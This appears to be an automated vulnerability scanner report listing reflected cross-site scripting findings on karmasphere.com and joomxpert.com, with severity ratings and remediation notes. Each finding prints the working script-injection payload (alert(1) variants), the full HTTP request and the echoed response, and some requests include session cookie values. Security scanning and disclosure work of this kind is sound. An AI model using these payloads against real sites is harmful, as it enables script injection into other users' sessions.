HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:38 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/kspec8570';alert(1)//da627bcc128/purchase.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5e62'%3balert(1)//bc511ac55db was submitted in the REST URL parameter 2. This input was echoed as d5e62';alert(1)//bc511ac55db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspe/d5e62'%3balert(1)//bc511ac55db HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:57 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/kspe/d5e62';alert(1)//bc511ac55db&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.67. http://karmasphere.com/kspe/purchase.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://karmasphere.com
Path:
/kspe/purchase.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cb3f'%3balert(1)//4fc4fb23cdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cb3f';alert(1)//4fc4fb23cdb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kspe/purchase.html?8cb3f'%3balert(1)//4fc4fb23cdb=1 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 03:03:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <8cb3f';alert(1)//4fc4fb23cdb=1&title=Karmasphere Studio Professional Edition: Get It Now&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit d ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb48'%3balert(1)//0cda0bbc04 was submitted in the REST URL parameter 1. This input was echoed as 7bb48';alert(1)//0cda0bbc04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules7bb48'%3balert(1)//0cda0bbc04/mod_sp_news_highlighter/assets/css/style.php HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:53:27 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:53:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules7bb48';alert(1)//0cda0bbc04/mod_sp_news_highlighter/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit da ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33e32'%3balert(1)//e846e504266 was submitted in the REST URL parameter 2. This input was echoed as 33e32';alert(1)//e846e504266 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter33e32'%3balert(1)//e846e504266/assets/css/style.php HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:57:15 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:57:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter33e32';alert(1)//e846e504266/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeite ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c043'%3balert(1)//d81ca0526a0 was submitted in the REST URL parameter 3. This input was echoed as 1c043';alert(1)//d81ca0526a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets1c043'%3balert(1)//d81ca0526a0/css/style.php HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:57:58 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:57:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets1c043';alert(1)//d81ca0526a0/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70757'%3balert(1)//86fa2cf4d79 was submitted in the REST URL parameter 4. This input was echoed as 70757';alert(1)//86fa2cf4d79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css70757'%3balert(1)//86fa2cf4d79/style.php HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:59:23 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:59:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets/css70757';alert(1)//86fa2cf4d79/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c935'%3balert(1)//582250f6d9 was submitted in the REST URL parameter 5. This input was echoed as 1c935';alert(1)//582250f6d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css/1c935'%3balert(1)//582250f6d9 HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:46 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/modules/mod_sp_news_highlighter/assets/css/1c935';alert(1)//582250f6d9&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
3.73. http://www.joomxpert.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.joomxpert.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9557"><a>a3ee55004ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?f9557"><a>a3ee55004ad=1 HTTP/1.1 Host: www.joomxpert.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 02:50:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Set-Cookie: 7b455f4d3ab614277ad9c7fb1aeeb2a3=8clqnfh50qc4ltt79flouvpne1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Tue, 01 Feb 2011 02:50:47 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31516
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd9f9'%3balert(1)//50f1acaf291 was submitted in the REST URL parameter 1. This input was echoed as fd9f9';alert(1)//50f1acaf291 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Downloadfd9f9'%3balert(1)//50f1acaf291/register-for-community-edition.html HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Date: Mon, 31 Jan 2011 03:04:57 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=966766fe8960157e672b68b7924393ca; path=/ Last-Modified: Mon, 31 Jan 2011 03:04:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35071
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/Downloadfd9f9';alert(1)//50f1acaf291/register-for-community-edition.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event w ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d1f0'%3balert(1)//b0c89b924 was submitted in the REST URL parameter 2. This input was echoed as 2d1f0';alert(1)//b0c89b924 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/2d1f0'%3balert(1)//b0c89b924 HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Date: Mon, 31 Jan 2011 03:05:06 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; path=/ Last-Modified: Mon, 31 Jan 2011 03:05:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34997
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/Download/2d1f0';alert(1)//b0c89b924&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of the _kk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a973d'%3balert(1)//32229679544 was submitted in the _kk parameter. This input was echoed as a973d';alert(1)//32229679544 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?_kk=hadoop%20clouda973d'%3balert(1)//32229679544&_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223 HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 03:04:56 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=b8c0ada8175dc9763b9423480dc2281f; path=/ Last-Modified: Mon, 31 Jan 2011 03:04:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <_kk=hadoop clouda973d';alert(1)//32229679544> ...[SNIP]...
The value of the _kt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2722'%3balert(1)//014afdd3561 was submitted in the _kt parameter. This input was echoed as d2722';alert(1)//014afdd3561 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?_kk=hadoop%20cloud&_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223d2722'%3balert(1)//014afdd3561 HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 03:05:06 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=075eda283f9bd2bf7906c69a8ab6bfb5; path=/ Last-Modified: Mon, 31 Jan 2011 03:05:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223d2722';alert(1)//014afdd3561&title=Register for Karmasphere Studio Community Edition&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das E ...[SNIP]...
3.78. http://www.karmasphere.com/Download/register-for-community-edition.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.karmasphere.com
Path:
/Download/register-for-community-edition.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 806fd'%3balert(1)//5a5ba53388c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 806fd';alert(1)//5a5ba53388c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?806fd'%3balert(1)//5a5ba53388c=1 HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
